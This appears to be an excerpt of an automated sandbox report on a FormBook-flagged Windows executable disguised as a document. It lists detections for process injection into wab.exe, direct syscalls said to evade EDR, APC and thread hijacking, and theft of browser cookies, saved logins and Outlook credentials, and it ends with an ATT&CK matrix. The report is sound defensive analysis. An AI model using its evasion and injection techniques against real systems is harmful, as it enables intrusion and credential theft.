Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2F78A mov eax, dword ptr fs:[00000030h]	1_2_02F2F78A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B765 mov eax, dword ptr fs:[00000030h]	1_2_02E6B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B765 mov eax, dword ptr fs:[00000030h]	1_2_02E6B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B765 mov eax, dword ptr fs:[00000030h]	1_2_02E6B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B765 mov eax, dword ptr fs:[00000030h]	1_2_02E6B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E78770 mov eax, dword ptr fs:[00000030h]	1_2_02E78770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]	1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]	1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]	1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]	1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]	1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]	1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]	1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]	1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]	1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]	1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]	1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]	1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA674D mov esi, dword ptr fs:[00000030h]	1_2_02EA674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA674D mov eax, dword ptr fs:[00000030h]	1_2_02EA674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA674D mov eax, dword ptr fs:[00000030h]	1_2_02EA674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E83740 mov eax, dword ptr fs:[00000030h]	1_2_02E83740
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E83740 mov eax, dword ptr fs:[00000030h]	1_2_02E83740
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E83740 mov eax, dword ptr fs:[00000030h]	1_2_02E83740
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E70750 mov eax, dword ptr fs:[00000030h]	1_2_02E70750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF4755 mov eax, dword ptr fs:[00000030h]	1_2_02EF4755
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2750 mov eax, dword ptr fs:[00000030h]	1_2_02EB2750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2750 mov eax, dword ptr fs:[00000030h]	1_2_02EB2750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F43749 mov eax, dword ptr fs:[00000030h]	1_2_02F43749
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E73720 mov eax, dword ptr fs:[00000030h]	1_2_02E73720
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F4B73C mov eax, dword ptr fs:[00000030h]	1_2_02F4B73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F4B73C mov eax, dword ptr fs:[00000030h]	1_2_02F4B73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F4B73C mov eax, dword ptr fs:[00000030h]	1_2_02F4B73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F4B73C mov eax, dword ptr fs:[00000030h]	1_2_02F4B73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8F720 mov eax, dword ptr fs:[00000030h]	1_2_02E8F720
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8F720 mov eax, dword ptr fs:[00000030h]	1_2_02E8F720
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8F720 mov eax, dword ptr fs:[00000030h]	1_2_02E8F720
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAC720 mov eax, dword ptr fs:[00000030h]	1_2_02EAC720
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAC720 mov eax, dword ptr fs:[00000030h]	1_2_02EAC720
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA273C mov eax, dword ptr fs:[00000030h]	1_2_02EA273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA273C mov ecx, dword ptr fs:[00000030h]	1_2_02EA273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA273C mov eax, dword ptr fs:[00000030h]	1_2_02EA273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69730 mov eax, dword ptr fs:[00000030h]	1_2_02E69730
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69730 mov eax, dword ptr fs:[00000030h]	1_2_02E69730
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3972B mov eax, dword ptr fs:[00000030h]	1_2_02F3972B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2F72E mov eax, dword ptr fs:[00000030h]	1_2_02F2F72E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7973A mov eax, dword ptr fs:[00000030h]	1_2_02E7973A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7973A mov eax, dword ptr fs:[00000030h]	1_2_02E7973A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EEC730 mov eax, dword ptr fs:[00000030h]	1_2_02EEC730
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA5734 mov eax, dword ptr fs:[00000030h]	1_2_02EA5734
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E77703 mov eax, dword ptr fs:[00000030h]	1_2_02E77703
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E75702 mov eax, dword ptr fs:[00000030h]	1_2_02E75702
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E75702 mov eax, dword ptr fs:[00000030h]	1_2_02E75702
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAC700 mov eax, dword ptr fs:[00000030h]	1_2_02EAC700
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAF71F mov eax, dword ptr fs:[00000030h]	1_2_02EAF71F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAF71F mov eax, dword ptr fs:[00000030h]	1_2_02EAF71F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E70710 mov eax, dword ptr fs:[00000030h]	1_2_02E70710
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA0710 mov eax, dword ptr fs:[00000030h]	1_2_02EA0710
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E704E5 mov ecx, dword ptr fs:[00000030h]	1_2_02E704E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F194E0 mov eax, dword ptr fs:[00000030h]	1_2_02F194E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F454DB mov eax, dword ptr fs:[00000030h]	1_2_02F454DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E764AB mov eax, dword ptr fs:[00000030h]	1_2_02E764AB

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: RN# D7521-RN-00353 REV-2.exe, ------.cs	Reference to suspicious API methods: LoadLibrary(_FBCA_FBB2_060D_FDD5(_FD48_066D._06E4_06FE_FDE2_FDC8))
Source: RN# D7521-RN-00353 REV-2.exe, ------.cs	Reference to suspicious API methods: GetProcAddress(intPtr, _FBCA_FBB2_060D_FDD5(_FD48_066D._FDDD_FBD2_061A_0610_FDE7_FDDC))
Source: RN# D7521-RN-00353 REV-2.exe, ------.cs	Reference to suspicious API methods: VirtualProtect(procAddress, (uint)array.ToArray().Length, 64u, out var _06E2_061F_06D6_064C_06DA_06DB_06D8)

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Memory allocated: C:\Program Files (x86)\Windows Mail\wab.exe base: 400000 protect: page execute and read and write

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtSetInformationThread: Direct from: 0x76F02ECC	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Windows\SysWOW64\auditpol.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: NULL target: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: NULL target: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\auditpol.exe

Thread register set: target process: 4420

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\auditpol.exe

Thread APC queued: target process: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 28CF008	Jump to behavior

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Process created: C:\Windows\SysWOW64\auditpol.exe "C:\Windows\SysWOW64\auditpol.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: uIklAoJgpkP.exe, 00000009.00000000.1936872722.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, uIklAoJgpkP.exe, 00000009.00000002.4129294519.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129599501.0000000000D10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: uIklAoJgpkP.exe, 00000009.00000000.1936872722.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, uIklAoJgpkP.exe, 00000009.00000002.4129294519.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129599501.0000000000D10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: uIklAoJgpkP.exe, 00000009.00000000.1936872722.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, uIklAoJgpkP.exe, 00000009.00000002.4129294519.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129599501.0000000000D10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: uIklAoJgpkP.exe, 00000009.00000000.1936872722.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, uIklAoJgpkP.exe, 00000009.00000002.4129294519.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129599501.0000000000D10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Queries volume information: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4128918801.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4128970770.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4131269057.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015330736.0000000000570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015886760.0000000004F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4129577177.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\auditpol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\auditpol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4128918801.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4128970770.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4131269057.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015330736.0000000000570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015886760.0000000004F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4129577177.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	612 Process Injection	3 Virtualization/Sandbox Evasion	1 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	3 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
